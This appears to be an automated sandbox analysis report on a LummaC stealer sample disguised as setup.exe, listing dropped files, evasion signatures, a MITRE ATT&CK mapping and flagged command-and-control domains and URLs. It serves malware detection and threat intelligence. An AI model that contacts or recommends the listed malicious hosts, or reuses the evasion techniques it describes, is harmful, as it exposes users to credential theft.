          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: Yara matchFile source: Process Memory Space: setup.exe PID: 7252, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: setup.exe PID: 7252, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		11
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Command and Scripting Interpreter          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		LSASS Memory11
          File and Directory Discovery          		Remote Desktop Protocol31
          Data from Local System          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          PowerShell          		Logon Script (Windows)12
          Process Injection          		3
          Obfuscated Files or Information          		Security Account Manager224
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading          		NTDS1
          Query Registry          		Distributed Component Object ModelInput Capture114
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading          		LSA Secrets521
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts221
          Virtualization/Sandbox Evasion          		Cached Domain Credentials221
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Process Injection          		DCSync4
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582503 Sample: setup.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 79 learningypr.click 2->79 81 klipvumisui.shop 2->81 83 2 other IPs or domains 2->83 103 Suricata IDS alerts for network traffic 2->103 105 Found malware configuration 2->105 107 Malicious sample detected (through community Yara rule) 2->107 109 7 other signatures 2->109 12 setup.exe 1 2->12         started        signatures3 process4 dnsIp5 85 learningypr.click 104.21.32.1, 443, 49730, 49731 CLOUDFLARENETUS United States 12->85 87 cegu.shop 185.161.251.21, 443, 49745 NTLGB United Kingdom 12->87 89 klipvumisui.shop 172.67.208.58, 443, 49746 CLOUDFLARENETUS United States 12->89 69 C:\...\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe, PE32 12->69 dropped 111 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->111 113 Suspicious powershell command line found 12->113 115 Query firmware table information (likely to detect VMs) 12->115 117 3 other signatures 12->117 17 F3638EZUZ711WUU8SDVPW34XAAMUZ.exe 2 12->17         started        21 powershell.exe 15 23 12->21         started        file6 signatures7 process8 file9 61 C:\...\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, PE32 17->61 dropped 91 Multi AV Scanner detection for dropped file 17->91 23 F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp 3 5 17->23         started        93 Loading BitLocker PowerShell Module 21->93 26 conhost.exe 21->26         started        signatures10 process11 file12 63 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 23->63 dropped 65 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 23->65 dropped 28 F3638EZUZ711WUU8SDVPW34XAAMUZ.exe 2 23->28         started        process13 file14 67 C:\...\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, PE32 28->67 dropped 31 F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp 5 7 28->31         started        process15 file16 71 C:\Users\user\AppData\...\is-T64JA.tmp, PE32 31->71 dropped 73 C:\Users\user\...\BrightLib.exe (copy), PE32 31->73 dropped 75 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 31->75 dropped 77 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 31->77 dropped 34 BrightLib.exe 31->34         started        37 cmd.exe 31->37         started        39 cmd.exe 31->39         started        41 5 other processes 31->41 process17 signatures18 95 Tries to detect virtualization through RDTSC time measurements 34->95 97 Sample or dropped binary is a compiled AutoHotkey binary 34->97 99 Switches to a custom stack to bypass stack traces 34->99 101 Found direct / indirect Syscall (likely to bypass EDR) 34->101 43 conhost.exe 37->43         started        45 tasklist.exe 37->45         started        47 find.exe 37->47         started        49 conhost.exe 39->49         started        51 tasklist.exe 39->51         started        53 find.exe 39->53         started        55 conhost.exe 41->55         started        57 conhost.exe 41->57         started        59 11 other processes 41->59 process19

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          setup.exe3%ReversingLabs

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe39%ReversingLabsWin32.Spyware.Lummastealer
          C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\is-EUFB2.tmp\_isetup\_isdecmp.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\is-EUFB2.tmp\_isetup\_setup64.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\is-MO41V.tmp\_isetup\_isdecmp.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\is-MO41V.tmp\_isetup\_setup64.tmp0%ReversingLabs
          C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)8%ReversingLabs
          C:\Users\user\AppData\Roaming\ColorStreamLib\is-T64JA.tmp8%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://learningypr.click/api100%Avira URL Cloudmalware
          https://learningypr.click/apb100%Avira URL Cloudmalware
          learningypr.click100%Avira URL Cloudmalware
          https://klipvumisui.shop:443/int_clp_sha.txt100%Avira URL Cloudmalware
          http://michaeluno.jp/40%Avira URL Cloudsafe
          https://learningypr.click/apiS100%Avira URL Cloudmalware
          http://www.toolwiz.com0%Avira URL Cloudsafe
          http://www.autohotkey.comCould0%Avira URL Cloudsafe
          https://learningypr.click/apic100%Avira URL Cloudmalware
          https://learningypr.click/apij100%Avira URL Cloudmalware
          https://learningypr.click/pp100%Avira URL Cloudmalware
          https://klipvumisui.shop/100%Avira URL Cloudmalware
          https://learningypr.click/pi100%Avira URL Cloudmalware
          http://crl.usertru0%Avira URL Cloudsafe
          https://learningypr.click/Q100%Avira URL Cloudmalware
          https://learningypr.click:443/api100%Avira URL Cloudmalware
          https://learningypr.click/apies=0F100%Avira URL Cloudmalware
          http://crl.micro4f0%Avira URL Cloudsafe
          https://learningypr.click/apiF100%Avira URL Cloudmalware
          https://cegu.shop/8574262446/ph.txt3h100%Avira URL Cloudmalware
          http://crl.microsoft.co0%Avira URL Cloudsafe
          https://klipvumisui.shop/int_clp_sha.txt~100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          cegu.shop
          		185.161.251.21
          		truefalse
            		high
            learningypr.click
            		104.21.32.1
            		truetrue
              		unknown
              klipvumisui.shop
              		172.67.208.58
              		truefalse
                		high
                dfgh.online
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  scentniej.buzzfalse
                    		high
                    learningypr.clicktrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://learningypr.click/apitrue
                    • Avira URL Cloud: malware
                    		unknown
                    rebuildeso.buzzfalse
                      		high
                      appliacnesot.buzzfalse
                        		high
                        screwamusresz.buzzfalse
                          		high
                          cashfuzysao.buzzfalse
                            		high
                            inherineau.buzzfalse
                              		high
                              hummskitnj.buzzfalse
                                		high
                                https://klipvumisui.shop/int_clp_sha.txtfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabsetup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUsetup.exe, 00000000.00000003.2009593627.0000000003BB2000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2009507319.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe, 00000006.00000000.2071669913.0000000000F51000.00000020.00000001.01000000.00000008.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                      		high
                                      https://certs.securetrust.com/CA0:setup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://klipvumisui.shop:443/int_clp_sha.txtsetup.exe, 00000000.00000002.2088273574.000000000096D000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://crl.usertrF3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                              		high
                                              http://crl.vikingcloud.com/TWGCA.crl0tsetup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                		high
                                                https://certs.securetrust.com/CA05setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                  		high
                                                  https://learningypr.click/apbsetup.exe, 00000000.00000003.1885564075.000000000095E000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2014602281.0000000005351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.remobjects.com/psF3638EZUZ711WUU8SDVPW34XAAMUZ.exe, 00000006.00000003.2075890487.000000000336F000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe, 00000006.00000003.2085146266.000000007F31B000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000000.2092228828.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000000.2112064936.0000000000E7D000.00000020.00000001.01000000.0000000C.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.8.drfalse
                                                      		high
                                                      http://www.toolwiz.comsetup.exefalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2022246655.00000000063B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.innosetup.com/F3638EZUZ711WUU8SDVPW34XAAMUZ.exe, 00000006.00000003.2075890487.000000000336F000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe, 00000006.00000003.2085146266.000000007F31B000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000000.2092228828.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000000.2112064936.0000000000E7D000.00000020.00000001.01000000.0000000C.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.8.drfalse
                                                          		high
                                                          https://certs.securetrust.com/CA0setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                            		high
                                                            http://www.autohotkey.comCouldBrightLib.exe, 00000025.00000002.2607198413.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000025.00000000.2570070848.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-T64JA.tmp.9.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2014602281.0000000005351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.certum.pl/CPS0F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                		high
                                                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://learningypr.click/apiSsetup.exe, 00000000.00000002.2078744236.00000000008B9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://michaeluno.jp/4BrightLib.exe, 00000025.00000002.2608169380.0000000003270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2014602281.00000000054A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crl.certum.pl/ctnca.crl0kF3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                        		high
                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2014602281.00000000054A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://microsoft.cosetup.exe, 00000000.00000003.1828202359.000000000094A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2005263169.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2087997454.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1885564075.0000000000957000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://go.micropowershell.exe, 00000004.00000002.2014602281.0000000005B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://contoso.com/Iconpowershell.exe, 00000004.00000002.2022246655.00000000063B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://learningypr.click/apicsetup.exe, 00000000.00000002.2078744236.00000000008B9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://learningypr.click/apijsetup.exe, 00000000.00000003.1828202359.0000000000917000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    http://ocsp.rootca1.amazontrust.com0:setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.autohotkey.comBrightLib.exe, 00000025.00000002.2607198413.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000025.00000000.2570070848.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-T64JA.tmp.9.drfalse
                                                                                        		high
                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016setup.exe, 00000000.00000003.1830105452.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841442094.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829977664.0000000003702000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841764761.00000000036B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.ecosia.org/newtab/setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brsetup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2014602281.00000000054A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://learningypr.click/pisetup.exe, 00000000.00000002.2078744236.00000000008B9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://learningypr.click/ppsetup.exe, 00000000.00000003.1885564075.000000000095E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                http://crl.usertruF3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://learningypr.click/Qsetup.exe, 00000000.00000003.1828202359.0000000000917000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0setup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                  		high
                                                                                                  https://klipvumisui.shop/setup.exe, 00000000.00000002.2088273574.000000000096D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://learningypr.click:443/apisetup.exe, 00000000.00000003.1828202359.0000000000904000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1948459100.000000000096D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2088273574.000000000096D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://support.microsofsetup.exe, 00000000.00000003.1829977664.0000000003704000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                        		high
                                                                                                        http://www.info-zip.org/BrightLib.exe, 00000025.00000002.2630344211.000000003A04C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://learningypr.click/apiFsetup.exe, 00000000.00000003.1841688890.0000000003666000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          https://learningypr.click/apies=0Fsetup.exe, 00000000.00000003.1828202359.000000000094A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          http://ocsp.securetrust.com/0?setup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                            		high
                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplessetup.exe, 00000000.00000003.1830105452.0000000003691000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://crl.micro4fpowershell.exe, 00000004.00000002.2025410025.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://repository.certum.pl/cscasha2.cer0F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                		high
                                                                                                                http://ocsp.sectigo.com0F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                  		high
                                                                                                                  http://ocsp.vikingcloud.com/0Asetup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                                    		high
                                                                                                                    http://certs.securetrust.com/issuers/TWGCA.crt0setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                                      		high
                                                                                                                      http://ocsp.vikingcloud.com/0:setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                                        		high
                                                                                                                        https://cegu.shop/8574262446/ph.txt3hsetup.exe, 00000000.00000003.2073247216.000000000090D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2005938451.0000000000909000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        		unknown
                                                                                                                        https://contoso.com/Licensepowershell.exe, 00000004.00000002.2022246655.00000000063B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://dfgh.online/invoker.php?compName=powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17setup.exe, 00000000.00000003.1830105452.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841442094.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829977664.0000000003702000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841764761.00000000036B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://go.microspowershell.exe, 00000004.00000002.2014602281.00000000057AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://crl.microsoft.copowershell.exe, 00000004.00000002.2028338121.0000000008C42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://x1.c.lencr.org/0setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://x1.i.lencr.org/0setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://crt.sectigo.com/SectigF3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		high
